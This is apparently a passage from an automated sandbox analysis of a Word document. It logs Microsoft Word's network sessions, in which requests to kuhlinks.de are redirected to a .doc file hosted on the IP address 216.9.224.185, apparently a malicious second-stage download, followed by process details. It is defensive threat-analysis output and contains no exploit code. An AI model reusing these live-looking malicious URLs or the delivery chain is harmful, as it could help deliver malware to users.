            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p8NZZxs2YpcMN0sC2HNRbherDeG1doE4c7BoJhBaKHs8EPYnIu88wLIeUS0Lv7i3B%2FyubEH8CEmh9932zmdxXkYRsILVsefSrYoevQ2rlSR4dSZ%2F9x6iB2DlDF27ng%3D%3D"}],"group":"cf-nel","max_age":604800}
            Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=131428&min_rtt=130398&rtt_var=28563&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=841&delivery_rate=28558&cwnd=226&unsent_bytes=0&cid=6d5d3262b51173d4&ts=639&x=0"
            2025-04-02 10:00:40 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
            Data Ascii: 8GET,HEAD
            2025-04-02 10:00:40 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.2460834172.67.144.1404437312C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            TimestampBytes transferredDirectionData
            2025-04-02 10:00:40 UTC310OUTHEAD /3ri5DVX HTTP/1.1
            Connection: Keep-Alive
            Authorization: Bearer
            User-Agent: Microsoft Office Word 2014
            X-Office-Major-Version: 16
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
            X-IDCRL_ACCEPTED: t
            Host: kuhlinks.de
            2025-04-02 10:00:41 UTC1204INHTTP/1.1 302 Found
            Date: Wed, 02 Apr 2025 10:00:41 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 192
            Connection: close
            location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc
            strict-transport-security: max-age=15552000; includeSubDomains
            vary: Accept
            x-content-type-options: nosniff
            x-dns-prefetch-control: off
            x-download-options: noopen
            x-frame-options: SAMEORIGIN
            x-xss-protection: 1; mode=block
            cf-cache-status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ObtIqYNqC8BkUIwIt4b%2FWdMpovXDYnPDi568zH8s3%2Bp8K8cMoZYC461VPHTT6wO%2F28TRvIGiTcqnVniVRPZdVU28Mu1SJzpIo3sgrS2JukUJ0Oe%2F3pKOKZ%2BWMLDl%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 929f7b091968566e-EWR
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=134831&min_rtt=130470&rtt_var=32039&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=924&delivery_rate=28529&cwnd=234&unsent_bytes=0&cid=6c32449698082076&ts=656&x=0"


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.2460838172.67.144.1404437312C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            TimestampBytes transferredDirectionData
            2025-04-02 10:00:42 UTC190OUTGET /3ri5DVX HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Host: kuhlinks.de
            Connection: Keep-Alive
            2025-04-02 10:00:42 UTC1194INHTTP/1.1 302 Found
            Date: Wed, 02 Apr 2025 10:00:42 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 192
            Connection: close
            Cf-Ray: 929f7b11df014228-EWR
            Server: cloudflare
            Location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc
            Strict-Transport-Security: max-age=15552000; includeSubDomains
            Vary: Accept
            X-Content-Type-Options: nosniff
            X-Dns-Prefetch-Control: off
            X-Download-Options: noopen
            X-Frame-Options: SAMEORIGIN
            X-Xss-Protection: 1; mode=block
            Cf-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dC7WRBeFABtnDyAUDvDACHhjdYz5q4F7LA%2BD5selGvWflkZbqyRFii0HI9gJxNYYCvCiA509LuCycQmVSpq4XKE0pbU9QQ%2BHts6Gm6IfDs9kzaGuLJFJzcsh5haAYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
            Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=96632&min_rtt=95927&rtt_var=20956&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=772&delivery_rate=38824&cwnd=217&unsent_bytes=0&cid=17cffa7a754cd8c1&ts=567&x=0"
            2025-04-02 10:00:42 UTC175INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 31 36 2e 39 2e 32 32 34 2e 31 38 35 2f 31 32 32 2f 77 65 6e 64 2f 73 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f 72 65 65 74 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 77 65 63 61 6e 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f 72 65 65 74 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 5f 5f 5f 5f 5f 5f 5f 5f 77 65 63 61 6e 69 6e 73 65 72 74 66 6f 72 67 6f 6f 64 66 6f 72 65 65 74
            Data Ascii: Found. Redirecting to http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeet
            2025-04-02 10:00:42 UTC17INData Raw: 75 72 6e 63 68 65 63 6c 6b 67 6f 6f 64 2e 64 6f 63
            Data Ascii: urncheclkgood.doc


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.2460843172.67.144.1404437312C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            TimestampBytes transferredDirectionData
            2025-04-02 10:00:44 UTC213OUTHEAD /3ri5DVX HTTP/1.1
            Authorization: Bearer
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            X-IDCRL_ACCEPTED: t
            User-Agent: Microsoft Office Existence Discovery
            Host: kuhlinks.de
            Connection: Keep-Alive
            2025-04-02 10:00:45 UTC1196INHTTP/1.1 302 Found
            Date: Wed, 02 Apr 2025 10:00:45 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 192
            Connection: close
            Cf-Ray: 929f7b209fd7d826-EWR
            Location: http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc
            Strict-Transport-Security: max-age=15552000; includeSubDomains
            Vary: Accept
            X-Content-Type-Options: nosniff
            X-Dns-Prefetch-Control: off
            X-Download-Options: noopen
            X-Frame-Options: SAMEORIGIN
            X-Xss-Protection: 1; mode=block
            Cf-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IP2C12XfXgrT%2Fb8TrQaKQQn4KzUdZNoMgtI1Icnp4EMAxDTMyEkpIeo3ZiN2Qwtli%2F3NDvFs2v%2FAdOWUvwzzEz8700eHN2Wpuh6p1JNdVCDBX1I1ymMHQ5OJc0q0AA%3D%3D"}],"group":"cf-nel","max_age":604800}
            Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=98139&min_rtt=97709&rtt_var=21260&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=827&delivery_rate=37626&cwnd=241&unsent_bytes=0&cid=57b00569acf32f17&ts=598&x=0"


            050100s020406080100

            Click to jump to process

            050100s0.0050100150MB

            Click to jump to process

            • File
            • Registry

            Click to dive into process behavior distribution

            Target ID:1
            Start time:06:00:33
            Start date:02/04/2025
            Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
            Imagebase:0x7ff7f51c0000
            File size:1'637'952 bytes
            MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:false
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

            No disassembly